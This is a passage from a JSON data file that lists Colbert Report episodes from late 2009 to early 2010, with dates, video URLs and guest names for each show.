        "http://thecolbertreport.cc.com/videos/xalyef/sign-off---thanks-to-bill-simmons---rosanne-cash",
        "http://thecolbertreport.cc.com/videos/w56skk/the-word---you-genics"
      ],
      "guest": "Rosanne Cash, Bill Simmons"
    },
    {
      "date": "2009-11-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vfdy5q/intro---11-02-09",
        "http://thecolbertreport.cc.com/videos/uke17x/used-karzai",
        "http://thecolbertreport.cc.com/videos/uxgb9s/alpha-dog-of-the-week---arnold-schwarzenegger",
        "http://thecolbertreport.cc.com/videos/t62cji/nicholas-thompson",
        "http://thecolbertreport.cc.com/videos/7g9pgn/sign-off---donate-to-the-u-s--speedskating-team"
      ],
      "guest": "Nicholas Thompson"
    },
    {
      "date": "2009-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hlio3b/intro---11-03-09",
        "http://thecolbertreport.cc.com/videos/zbi6j6/canadian-hackers-sabotage-colbert-nation",
        "http://thecolbertreport.cc.com/videos/olb2ep/nailed--em---mormon-church-trespassing",
        "http://thecolbertreport.cc.com/videos/qdk21v/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/sqdke8/sign-off---they-call-me-mister-fry",
        "http://thecolbertreport.cc.com/videos/b7il1x/sport-report---nyc-marathon---olympic-speedskating"
      ],
      "guest": "Andrew Sullivan"
    },
    {
      "date": "2009-11-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wm06ja/intro---11-04-09",
        "http://thecolbertreport.cc.com/videos/hzm3ur/-09-off-year-semi-presidential-electferendum",
        "http://thecolbertreport.cc.com/videos/src597/formidable-opponent---global-warming-with-al-gore",
        "http://thecolbertreport.cc.com/videos/lkkq9m/harold-evans",
        "http://thecolbertreport.cc.com/videos/64ucdo/sign-off---poison-gas",
        "http://thecolbertreport.cc.com/videos/ol1mvi/the-word---the-green-mile"
      ],
      "guest": "Harold Evans"
    },
    {
      "date": "2009-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ymrkt5/intro---11-05-09",
        "http://thecolbertreport.cc.com/videos/i7dq6q/guy-fawkers",
        "http://thecolbertreport.cc.com/videos/6vac7m/cheating-death---swine-flu-scam-detector---vaxaconda",
        "http://thecolbertreport.cc.com/videos/cj1lqu/william-bratton",
        "http://thecolbertreport.cc.com/videos/6e51a0/sign-off---donate-to-u-s--speedskating",
        "http://thecolbertreport.cc.com/videos/hnu3dh/tip-wag---rush-limbaugh---us-weekly"
      ],
      "guest": "Joey Cheek, Chief William Bratton"
    },
    {
      "date": "2009-11-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/p4del4/intro---11-09-09",
        "http://thecolbertreport.cc.com/videos/zhrahz/trouble--coverage",
        "http://thecolbertreport.cc.com/videos/uaeaom/u-s--speedskating-team-takes-gold",
        "http://thecolbertreport.cc.com/videos/62flai/thomas-campbell",
        "http://thecolbertreport.cc.com/videos/5hgk8f/sign-off---goodnight"
      ],
      "guest": "Thomas Campbell"
    },
    {
      "date": "2009-11-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nwm4io/intro---11-10-09",
        "http://thecolbertreport.cc.com/videos/bpec5m/barney-frank-is-not-a-great-outdoorsman",
        "http://thecolbertreport.cc.com/videos/476wty/maria-shriver",
        "http://thecolbertreport.cc.com/videos/rl73xb/sign-off---you-can-t-take-it-with-you",
        "http://thecolbertreport.cc.com/videos/ocuoqq/exclusive---better-know-a-district---delaware-s-at-large---mike-castle",
        "http://thecolbertreport.cc.com/videos/i4pgl0/better-know-a-district---delaware-s-at-large---mike-castle"
      ],
      "guest": "Maria Shriver"
    },
    {
      "date": "2009-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8m4icj/intro---11-11-09",
        "http://thecolbertreport.cc.com/videos/d3hhgz/goldman-sachs-does-god-s-work",
        "http://thecolbertreport.cc.com/videos/1al5v4/tip-wag---san-francisco-chronicle---george-clinton",
        "http://thecolbertreport.cc.com/videos/p4wqld/christopher-caldwell",
        "http://thecolbertreport.cc.com/videos/xp7fig/sign-off---stephen-s-fight-with-christopher-caldwell",
        "http://thecolbertreport.cc.com/videos/2vmljd/iraniversary---karim-sadjadpour"
      ],
      "guest": "Christopher Caldwell"
    },
    {
      "date": "2009-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lbfhkm/intro---11-12-09",
        "http://thecolbertreport.cc.com/videos/cnw6wz/miracle-whip-buys-ad-space",
        "http://thecolbertreport.cc.com/videos/ips2v8/the-word---the-money-shot",
        "http://thecolbertreport.cc.com/videos/2k90o4/sport-report---cricket-scandal---letter-writing-campaign",
        "http://thecolbertreport.cc.com/videos/1yilwm/woody-harrelson",
        "http://thecolbertreport.cc.com/videos/l85kiv/grover-the-hill"
      ],
      "guest": "Woody Harrelson"
    },
    {
      "date": "2009-11-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t5pqdy/intro---11-16-09",
        "http://thecolbertreport.cc.com/videos/8ggl86/obama-bows-to-japanese-emperor",
        "http://thecolbertreport.cc.com/videos/xgze85/alpha-dog-of-the-week---joe-perry",
        "http://thecolbertreport.cc.com/videos/6einjp/paul-goldberger",
        "http://thecolbertreport.cc.com/videos/i42i9t/sign-off---good-morning--burma"
      ],
      "guest": "Paul Goldberger"
    },
    {
      "date": "2009-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/im99fb/intro---11-17-09",
        "http://thecolbertreport.cc.com/videos/z1cr8v/kid-gloves---marc-kielburger",
        "http://thecolbertreport.cc.com/videos/ij8d04/malcolm-gladwell",
        "http://thecolbertreport.cc.com/videos/w71om6/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/mwjf6e/the-word---skeletons-in-the-closet"
      ],
      "guest": "Malcolm Gladwell"
    },
    {
      "date": "2009-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/24jack/intro---11-18-09",
        "http://thecolbertreport.cc.com/videos/odu5xx/eggo-waffles-shortage-alert",
        "http://thecolbertreport.cc.com/videos/cuhtda/threatdown---quetzalcoatl--santa-claus---canadian-groin-kickers",
        "http://thecolbertreport.cc.com/videos/ah5dzo/norah-jones",
        "http://thecolbertreport.cc.com/videos/1vm4fs/exclusive---better-know-a-district---california-s-12th---jackie-speier-pt--1",
        "http://thecolbertreport.cc.com/videos/udd9qu/exclusive---better-know-a-district---california-s-12th---jackie-speier-pt--2",
        "http://thecolbertreport.cc.com/videos/p8c7xo/better-know-a-district---california-s-12th---jackie-speier"
      ],
      "guest": "Norah Jones"
    },
    {
      "date": "2009-11-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6iz54h/stephen-shakes-his-moneymaker",
        "http://thecolbertreport.cc.com/videos/4tmz49/celebrating-the-ak-47---john-pike",
        "http://thecolbertreport.cc.com/videos/zy3jiq/sign-off---thanks--elvis-costello",
        "http://thecolbertreport.cc.com/videos/tf53hs/the-word---grand-old-pity-party"
      ],
      "guest": "John Pike, Elvis Costello"
    },
    {
      "date": "2009-11-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x90ton/intro---11-30-09",
        "http://thecolbertreport.cc.com/videos/qljewq/amateur-hour-at-the-white-house",
        "http://thecolbertreport.cc.com/videos/ahhfo9/better-know-a-lobby---ploughshares-fund",
        "http://thecolbertreport.cc.com/videos/ec0x55/cevin-soling",
        "http://thecolbertreport.cc.com/videos/53k9co/sign-off---goodnight"
      ],
      "guest": "Dan Esty, Cevin Soling"
    },
    {
      "date": "2009-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jvjn7h/intro---12-01-09",
        "http://thecolbertreport.cc.com/videos/fj2x2m/u-s--army-chain-of-command",
        "http://thecolbertreport.cc.com/videos/zwjey6/gold--frankincense-and-mars---guy-consolmagno",
        "http://thecolbertreport.cc.com/videos/s6mur0/sherman-alexie",
        "http://thecolbertreport.cc.com/videos/km8wtf/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/bohr52/something-is-melting-in-denmark---dan-esty"
      ],
      "guest": "Guy Consolmagno, Sherman Alexie"
    },
    {
      "date": "2009-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lstmf1/intro---12-02-09",
        "http://thecolbertreport.cc.com/videos/yvq647/deployment-figures",
        "http://thecolbertreport.cc.com/videos/et6ksb/craig-watkins",
        "http://thecolbertreport.cc.com/videos/cyylc0/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/ndi826/better-know-a-made-up-district---connecticut-s-42nd"
      ],
      "guest": "Craig Watkins"
    },
    {
      "date": "2009-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qrqaja/formidable-opponent---gary-the-tennis-coach",
        "http://thecolbertreport.cc.com/videos/q8vv0p/intro---12-03-09",
        "http://thecolbertreport.cc.com/videos/knxrx6/tiger-s-tale",
        "http://thecolbertreport.cc.com/videos/hw80nv/skate-expectations---skeleton-team-tryouts---zach-lund",
        "http://thecolbertreport.cc.com/videos/heye88/janet-napolitano",
        "http://thecolbertreport.cc.com/videos/dy9y1l/sign-off---welcome-sean-julien",
        "http://thecolbertreport.cc.com/videos/qx8k9b/cheating-death---r-j--reynolds--genzyme---bionic-bottom"
      ],
      "guest": "Sec. Janet Napolitano"
    },
    {
      "date": "2009-12-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/opl0gz/intro---12-07-09",
        "http://thecolbertreport.cc.com/videos/l9wksx/who-s-attacking-me-now----g--edward-deseve",
        "http://thecolbertreport.cc.com/videos/t0b3f4/craziest-f--king-thing-i-ve-ever-heard---tongue-eating-parasite",
        "http://thecolbertreport.cc.com/videos/pgp8y2/bill-t--jones"
      ],
      "guest": "Bill T. Jones, a performance by the cast of \"Fela\""
    },
    {
      "date": "2009-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7a6f7k/intro---12-08-09",
        "http://thecolbertreport.cc.com/videos/0y3uce/how-far-good-parents-will-go",
        "http://thecolbertreport.cc.com/videos/gcu1ou/fed-s-dead---bernie-sanders",
        "http://thecolbertreport.cc.com/videos/9o2lyz/andy-schlafly",
        "http://thecolbertreport.cc.com/videos/2v1vhb/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/w4zn3p/tip-wag---jonas-brothers--fox-news---japanese-burger-king"
      ],
      "guest": "Sen. Bernie Sanders, Andy Schlafly"
    },
    {
      "date": "2009-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fdjwxb/intro---12-09-09",
        "http://thecolbertreport.cc.com/videos/ckek7p/monkey-threatdown---holes---banana-too-high",
        "http://thecolbertreport.cc.com/videos/h3kb0s/the-blitzkrieg-on-grinchitude---hallmark---krampus",
        "http://thecolbertreport.cc.com/videos/is6uvv/matt-taibbi",
        "http://thecolbertreport.cc.com/videos/mlp3y1/sign-off---goodnight-with-krampus",
        "http://thecolbertreport.cc.com/videos/2l8p98/fed-s-dead"
      ],
      "guest": "Matt Taibbi"
    },
    {
      "date": "2009-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/03g0d5/obama-s-nobel-prize-speech---afghandyland",
        "http://thecolbertreport.cc.com/videos/zivscx/skate-expectations---bobsled-team-tryouts",
        "http://thecolbertreport.cc.com/videos/hjnxot/lara-logan",
        "http://thecolbertreport.cc.com/videos/y74r8f/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/2jc7dn/the-word---grand-old-purity"
      ],
      "guest": "Lara Logan"
    },
    {
      "date": "2009-12-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/efg3d5/intro---12-14-09",
        "http://thecolbertreport.cc.com/videos/9wxgc9/president-obama---the-colbert-interview",
        "http://thecolbertreport.cc.com/videos/t1tsns/stephen-challenges-shani-davis---katherine-reutter",
        "http://thecolbertreport.cc.com/videos/vt4qtf/snoop-dogg"
      ],
      "guest": "Katherine Reutter, Snoop Dogg"
    },
    {
      "date": "2009-12-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x6ydfv/intro---12-15-09",
        "http://thecolbertreport.cc.com/videos/3plx6x/for-he-s-a-jowly-good-fellow",
        "http://thecolbertreport.cc.com/videos/10vyk2/the-blitzkrieg-on-grinchitude---treesus---christ-mas-tree",
        "http://thecolbertreport.cc.com/videos/i16cci/alicia-keys",
        "http://thecolbertreport.cc.com/videos/qn15hk/stephen-challenges-shani-davis",
        "http://thecolbertreport.cc.com/videos/u5g55p/exclusive---extended-interview-with-barack-obama"
      ],
      "guest": "Alicia Keys"
    },
    {
      "date": "2009-12-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ozgmuy/accenture-drops-tiger-woods",
        "http://thecolbertreport.cc.com/videos/4jdam2/the-word---spyvate-sector",
        "http://thecolbertreport.cc.com/videos/bjlb37/tom-brokaw",
        "http://thecolbertreport.cc.com/videos/q9eqq1/sign-off---goodbye--2009",
        "http://thecolbertreport.cc.com/videos/ufq6qh/prescott-financial---gold--women---sheep"
      ],
      "guest": "Tom Brokaw"
    }
  ],
  "2010": [
    {
      "date": "2010-01-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a6c63f/intro---goodbye--old-set",
        "http://thecolbertreport.cc.com/videos/qr3067/high-definition-upgrade",
        "http://thecolbertreport.cc.com/videos/ca8z2z/genitalia-bomb-threat",
        "http://thecolbertreport.cc.com/videos/hospuh/skate-expectations---curling-team-tryouts",
        "http://thecolbertreport.cc.com/videos/bqki32/skate-expectations---curling-team-tryouts---colbert-vs--shuster",
        "http://thecolbertreport.cc.com/videos/ytow3n/sign-off---thanks-for-the-new-set"
      ],
      "guest": "Erick Erickson"
    },
    {
      "date": "2010-01-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l0fai0/intro---01-05-10",
        "http://thecolbertreport.cc.com/videos/qomtkk/high-definition-advertising",
        "http://thecolbertreport.cc.com/videos/ywy8j4/night-of-terror---the-crapification-of-the-american-pant-scape",
        "http://thecolbertreport.cc.com/videos/s2n141/the-word---ideal-or-no-deal",
        "http://thecolbertreport.cc.com/videos/t3fpvm/better-know-an-enemy---yemen",
        "http://thecolbertreport.cc.com/videos/r8x6ag/riley-crane",
        "http://thecolbertreport.cc.com/videos/doe1xo/sign-off---stephen-draws-woodstock"
      ],
      "guest": "Riley Crane"
    },
    {
      "date": "2010-01-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rewr4u/intro---01-06-10",
        "http://thecolbertreport.cc.com/videos/u584e6/a-message-to-standard-definition-cable-providers",
        "http://thecolbertreport.cc.com/videos/g2gimh/drag-me-to-health---ezra-klein---linda-douglass",
        "http://thecolbertreport.cc.com/videos/h3mxst/alpha-dog-of-the-week---domino-s-pizza",
        "http://thecolbertreport.cc.com/videos/4cd9bx/charles-moore",
        "http://thecolbertreport.cc.com/videos/elm4s5/sign-off---not-stephen-s-show"
      ],
      "guest": "Capt. Charles Moore"
    },
    {
      "date": "2010-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uo3v4r/intro---01-07-10",
        "http://thecolbertreport.cc.com/videos/f2zb2u/failure-to-connect-the-dots",
        "http://thecolbertreport.cc.com/videos/z3kdhi/fatal-subtraction---barry-scheck",
        "http://thecolbertreport.cc.com/videos/wi0ong/tip-wag---burj-dubai--avatar---transgender-appointees",
        "http://thecolbertreport.cc.com/videos/c3suh9/james-fowler",
        "http://thecolbertreport.cc.com/videos/tso1cs/sign-off---goodnight"
      ],
      "guest": "Barry Scheck, James Fowler"
    },
    {
      "date": "2010-01-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xptxw6/harry-reid-s-racial-praise",
        "http://thecolbertreport.cc.com/videos/3s1wqs/move-your-money---eugene-jarecki",
        "http://thecolbertreport.cc.com/videos/y47i8f/colbert-platinum---estate-tax---skull-ballot-box",
        "http://thecolbertreport.cc.com/videos/4q61kj/morgan-freeman",
        "http://thecolbertreport.cc.com/videos/8e60wq/sign-off---stephen-will-be-right-back"
      ],
      "guest": "Eugene Jarecki, Morgan Freeman"
    },
    {
      "date": "2010-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qjn9bh/intro---01-12-10",
        "http://thecolbertreport.cc.com/videos/7qig8p/roxxxy-the-sex-robot",
        "http://thecolbertreport.cc.com/videos/8ln9tv/cheating-death---alzheimer-s--jet-lag---female-libido",
        "http://thecolbertreport.cc.com/videos/7jfkm7/raj-patel"
      ],
      "guest": "Raj Patel"
    },
    {
      "date": "2010-01-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w3lt72/intro---01-13-10",
        "http://thecolbertreport.cc.com/videos/34mknq/game-change-gossip",
        "http://thecolbertreport.cc.com/videos/kwpeqs/sport-report---gilbert-arenas---mark-mcgwire",
        "http://thecolbertreport.cc.com/videos/t39jgx/movies-that-are-destroying-america---avatar-edition",
        "http://thecolbertreport.cc.com/videos/1xyrig/john-heilemann",
        "http://thecolbertreport.cc.com/videos/erf677/sign-off---mark-mcgwire-action-figure"
      ],
      "guest": "John Heilemann"
    },
    {
      "date": "2010-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t151qr/intro---01-14-10",
        "http://thecolbertreport.cc.com/videos/dbcboq/watercressgate",
        "http://thecolbertreport.cc.com/videos/et1vio/the-word---honor-bound",
        "http://thecolbertreport.cc.com/videos/7owg19/haiti-disaster-relief-donations---kathleen-sebelius",
        "http://thecolbertreport.cc.com/videos/gqd029/kathleen-sebelius",
        "http://thecolbertreport.cc.com/videos/afqd2o/sign-off---text-for-haiti-disaster-relief"
      ],
      "guest": "Kathleen Sebelius"
    },
    {
      "date": "2010-01-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i2h2wa/intro---01-18-10",
        "http://thecolbertreport.cc.com/videos/uqolbx/massachusetts-special-election",
        "http://thecolbertreport.cc.com/videos/6s93dq/coal-comfort---margaret-palmer",
        "http://thecolbertreport.cc.com/videos/2kgg0x/own-a-piece-of-histor-me---original-interview-table",
        "http://thecolbertreport.cc.com/videos/r6fzoi/emily-pilloton",
        "http://thecolbertreport.cc.com/videos/47fs6h/sign-off---home-barbershop-quartet-game"
      ],
      "guest": "Dr. Margaret Palmer, Emily Pilloton"
    },
    {
      "date": "2010-01-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/w2qqgl/intro---01-19-10",
        "http://thecolbertreport.cc.com/videos/9t5rlw/onward-christian-soldiers",
        "http://thecolbertreport.cc.com/videos/eseeb0/skate-expectations---speedskating-team-training",
        "http://thecolbertreport.cc.com/videos/nw0obk/skate-expectations---speedskating-team-training---tucker-fredricks",
        "http://thecolbertreport.cc.com/videos/wljw31/stephen-bosworth",
        "http://thecolbertreport.cc.com/videos/5zz1m5/sign-off---teleprompter-in-italics"
      ],
      "guest": "Amb. Stephen Bosworth"
    },
    {
      "date": "2010-01-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oarl2s/intro---01-20-10",
        "http://thecolbertreport.cc.com/videos/9fshqm/boston-dream-guy",
        "http://thecolbertreport.cc.com/videos/h7cxuq/skate-expectations---speedskating-race",
        "http://thecolbertreport.cc.com/videos/r0fs08/skate-expectations---speedskating-team-training---colbert-vs--davis",
        "http://thecolbertreport.cc.com/videos/9qoq3s/dick-ebersol",
        "http://thecolbertreport.cc.com/videos/ekjbd1/sign-off---original-interview-table-auction"
      ],
      "guest": "Dick Ebersol"
    },
    {
      "date": "2010-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dhnvbi/intro---01-21-10",
        "http://thecolbertreport.cc.com/videos/a891l1/own-a-piece-of-histor-me---legendary-interview-table",
        "http://thecolbertreport.cc.com/videos/3t1wu4/taliban-public-relations",
        "http://thecolbertreport.cc.com/videos/61faxb/the-word---two-faced",
        "http://thecolbertreport.cc.com/videos/fqdy69/threatdown---airport-security-edition",
        "http://thecolbertreport.cc.com/videos/nchr4z/john-farmer",
        "http://thecolbertreport.cc.com/videos/ngpu7c/sign-off---raise-money-for-haiti-relief"
      ],
      "guest": "John Farmer"
    },
    {
      "date": "2010-01-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ucog8c/intro---01-25-10",
        "http://thecolbertreport.cc.com/videos/2i26ye/obama-gets-called-for-jury-duty",
        "http://thecolbertreport.cc.com/videos/iyaiyz/the-word---manifest-density",
        "http://thecolbertreport.cc.com/videos/fgn6yx/alpha-dog-of-the-week---harold-ford-jr-",
        "http://thecolbertreport.cc.com/videos/y99wku/kati-marton",
        "http://thecolbertreport.cc.com/videos/6u56ui/sign-off---50th-anniversary-of-bubble-wrap"
      ],
      "guest": "Kati Marton"
    },
    {
      "date": "2010-01-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ukd1u/andre-bauer-is-not-against-animals",
        "http://thecolbertreport.cc.com/videos/1qu3mj/democrats-must-fight-back---paul-begala",
        "http://thecolbertreport.cc.com/videos/4cv6sy/tip-wag---creigh-deeds---scarebear-trail-companion",
        "http://thecolbertreport.cc.com/videos/t59ksv/mika-brzezinski",
        "http://thecolbertreport.cc.com/videos/oz7mss/own-a-piece-of-histor-me---original-c-shaped-anchor-desk"
      ],
      "guest": "Paul Begala, Mika Brzezinski"
    },
    {
      "date": "2010-01-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5wqyfx/intro---01-27-10",
        "http://thecolbertreport.cc.com/videos/69904a/hamid-karzai-s-fashionable-hat",
        "http://thecolbertreport.cc.com/videos/99bavp/the-word---prece-don-t",
        "http://thecolbertreport.cc.com/videos/9hb7jh/fox-news-puts-james-o-keefe-into-context",
        "http://thecolbertreport.cc.com/videos/suw63r/arthur-benjamin",
        "http://thecolbertreport.cc.com/videos/iljqkj/sign-off---give-stephen-an-ipad"
      ],
      "guest": "Arthur Benjamin"
    },
    {
      "date": "2010-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pg6y12/stephen-s-state-of-the-union-speech",
        "http://thecolbertreport.cc.com/videos/lnaqfo/david-gergen",
        "http://thecolbertreport.cc.com/videos/jsxv0a/sport-report---all-white-basketball---jana-rawlinson",
        "http://thecolbertreport.cc.com/videos/xebsoq/sign-off---bid-on-stephen-s-c-shaped-desk"
      ],
      "guest": "David Gergen"
    },
    {
      "date": "2010-02-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pg94s5/the-word---siren-song",
        "http://thecolbertreport.cc.com/videos/2n1vl2/sport-report---nicole-detling-miller---jessica-smith",
        "http://thecolbertreport.cc.com/videos/k0hjb1/harold-ford-jr-",
        "http://thecolbertreport.cc.com/videos/biwfer/sign-off---u-s-a-"
      ],
      "guest": "Nicole Detling Miller, Jessica Smith, Harold Ford Jr."
    },
    {
      "date": "2010-02-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u6k7x8/intro---02-02-10",
        "http://thecolbertreport.cc.com/videos/idx9j1/the-word---cognoscor-ergo-sum",
        "http://thecolbertreport.cc.com/videos/2ffk5q/bananafish-tale---henry-allen",
        "http://thecolbertreport.cc.com/videos/0xtws0/eliot-spitzer",
        "http://thecolbertreport.cc.com/videos/wfnsyt/sign-off---kentucky-fried-regret"
      ],
      "guest": "Eliot Spitzer"
    },
    {
      "date": "2010-02-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pmvmz3/intro---02-03-10",
        "http://thecolbertreport.cc.com/videos/4nj8ql/be-almost-all-that-you-can-be",
        "http://thecolbertreport.cc.com/videos/5iocp5/job-man-caravan",
        "http://thecolbertreport.cc.com/videos/sysu7h/job-man-caravan---peter-cove",
        "http://thecolbertreport.cc.com/videos/t6rlnb/john-durant",
        "http://thecolbertreport.cc.com/videos/s0494z/sign-off---office-pool"
      ],
      "guest": "Peter Cove, John Durant"
    },
    {
      "date": "2010-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zn4dgm/intro---02-04-10",
        "http://thecolbertreport.cc.com/videos/qkvdcs/hermaphrodites-can-t-be-gay",
        "http://thecolbertreport.cc.com/videos/qqtebr/tip-wag---waterboarding---canada-s-history",
        "http://thecolbertreport.cc.com/videos/6a6j6j/formidable-opponent---khalid-sheikh-mohammed-s-trial",
        "http://thecolbertreport.cc.com/videos/sm98y8/henry-louis-gates--jr-",
        "http://thecolbertreport.cc.com/videos/bsgq92/own-a-piece-of-histor-me---fireplace-portrait"
      ],
      "guest": "Henry Louis Gates"
    },
    {
      "date": "2010-02-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ek3awf/exclusive---skate-expectations---bobsled-team-tryouts-pt--1",
        "http://thecolbertreport.cc.com/videos/52kgrq/office-super-bowl-ad-pool",
        "http://thecolbertreport.cc.com/videos/2idiz7/the-word---faux--n--tell",
        "http://thecolbertreport.cc.com/videos/mtoffp/sarah-palin-uses-a-hand-o-prompter",
        "http://thecolbertreport.cc.com/videos/xdafq2/jonathan-safran-foer",
        "http://thecolbertreport.cc.com/videos/r5okcx/sign-off---goodnight"
      ],
      "guest": "Jonathan Safran Foer"
    },
    {
      "date": "2010-02-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/msydxm/exclusive---skate-expectations---bobsled-team-tryouts-pt--2",
        "http://thecolbertreport.cc.com/videos/s5t5z4/celebrate-black-history-month-with-heineken",
        "http://thecolbertreport.cc.com/videos/nwoc1b/corporate-free-speech---chris-dodd",
        "http://thecolbertreport.cc.com/videos/884juj/alpha-dog-of-the-week---markus-bestin",
        "http://thecolbertreport.cc.com/videos/uao9dj/george-stephanopoulos",
        "http://thecolbertreport.cc.com/videos/zcybb6/sign-off---it-s-lonely-at-the-top"
      ],
      "guest": "George Stephanopoulos"
    },
    {
      "date": "2010-02-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ka4dxt/exclusive---skate-expectations---bobsled-team-tryouts-pt--3",
        "http://thecolbertreport.cc.com/videos/l0cv8x/intro---02-10-10",
        "http://thecolbertreport.cc.com/videos/br6hwk/we-re-off-to-see-the-blizzard",
        "http://thecolbertreport.cc.com/videos/cu5mso/better-know-a-district---illinois--5th",
        "http://thecolbertreport.cc.com/videos/3752v8/better-know-a-district---illinois--5th---mike-quigley",
        "http://thecolbertreport.cc.com/videos/34z9mm/claire-danes",
        "http://thecolbertreport.cc.com/videos/f2whru/sign-off---goodnight"
      ],
      "guest": "Claire Danes"
    },
    {
      "date": "2010-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eyfb9f/exclusive---skate-expectations---curling-team-tryouts-pt--1",
        "http://thecolbertreport.cc.com/videos/65cpdn/iran-begins-enriching-uranian",
        "http://thecolbertreport.cc.com/videos/n5w4fs/the-word---political-suicide",
        "http://thecolbertreport.cc.com/videos/li6roe/sport-report---global-snow-drive---al-michaels",
        "http://thecolbertreport.cc.com/videos/s9qfmt/david-ross",
        "http://thecolbertreport.cc.com/videos/qbth0f/sign-off---see-you-in-vancouver"
      ],
      "guest": "Al Michaels, David Ross"
    },
    {
      "date": "2010-02-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jvyagn/exclusive---skate-expectations---speedskating-team-training-pt--1",
        "http://thecolbertreport.cc.com/videos/rbcb67/intro---02-22-10",
        "http://thecolbertreport.cc.com/videos/racwcb/vancouverage-2010---ed-colbert",
        "http://thecolbertreport.cc.com/videos/tzovg4/better-know-a-riding---vancouver-s-south",
        "http://thecolbertreport.cc.com/videos/5l4d9t/better-know-a-riding---vancouver-s-south---ujjal-dosanjh",
        "http://thecolbertreport.cc.com/videos/gg3l88/shaun-white",
        "http://thecolbertreport.cc.com/videos/iohppn/sign-off---you-are-not-americans"
      ],
      "guest": "Shaun White"
    },
    {
      "date": "2010-02-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iar6l3/exclusive---skate-expectations---speedskating-team-training-pt--2",
        "http://thecolbertreport.cc.com/videos/us6yyq/america-s-olympic-wins---lindsey-vonn",
        "http://thecolbertreport.cc.com/videos/1ftd3s/olympic-international-houses",
        "http://thecolbertreport.cc.com/videos/yd5amw/bob-costas",
        "http://thecolbertreport.cc.com/videos/4vx1ll/sign-off---bob-costas-rides-the-moose"
      ],
      "guest": "Lindsey Vonn, Bob Costas"
    },
    {
      "date": "2010-02-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j11loy/exclusive---better-know-a-riding---vancouver-s-south---ujjal-dosanjh-pt--1",
        "http://thecolbertreport.cc.com/videos/eom1sq/exclusive---better-know-a-riding---vancouver-s-south---ujjal-dosanjh-pt--2",
        "http://thecolbertreport.cc.com/videos/8olwnj/exclusive---better-know-a-riding---vancouver-s-south---ujjal-dosanjh-pt--3",
        "http://thecolbertreport.cc.com/videos/l0ax8q/exclusive---skate-expectations---speedskating-team-training-pt--3",
        "http://thecolbertreport.cc.com/videos/php8ta/cold-war-update---olympic-edition",
        "http://thecolbertreport.cc.com/videos/mrk7jd/freud-rage---the-iceman-counseleth",
        "http://thecolbertreport.cc.com/videos/7u3h32/ryan-st--onge---jeret-peterson",
        "http://thecolbertreport.cc.com/videos/ampazf/sign-off---as-they-say-in-canada"
      ],
      "guest": "Scott Hamilton, Jeret Peterson, Ryan St. Onge"
    },
    {
      "date": "2010-02-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i93x4n/exclusive---skate-expectations---speedskating-team-training-pt--4",
        "http://thecolbertreport.cc.com/videos/e7hgxz/intro---02-25-10",
        "http://thecolbertreport.cc.com/videos/jy3odd/stephen-distracts-bob-costas",
        "http://thecolbertreport.cc.com/videos/zoz0j2/freud-rage---the-iceman-counseleth---shani-davis",
        "http://thecolbertreport.cc.com/videos/iactcg/off-notice---canadian-iceholes",
        "http://thecolbertreport.cc.com/videos/j2htnd/seth-wescott",
        "http://thecolbertreport.cc.com/videos/2pub5y/sign-off---thank-you--everyone"
      ],
      "guest": "Shani Davis, Seth Wescott"
    },
    {
      "date": "2010-03-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r61kzy/intro---stephen-wins-the-olympics",
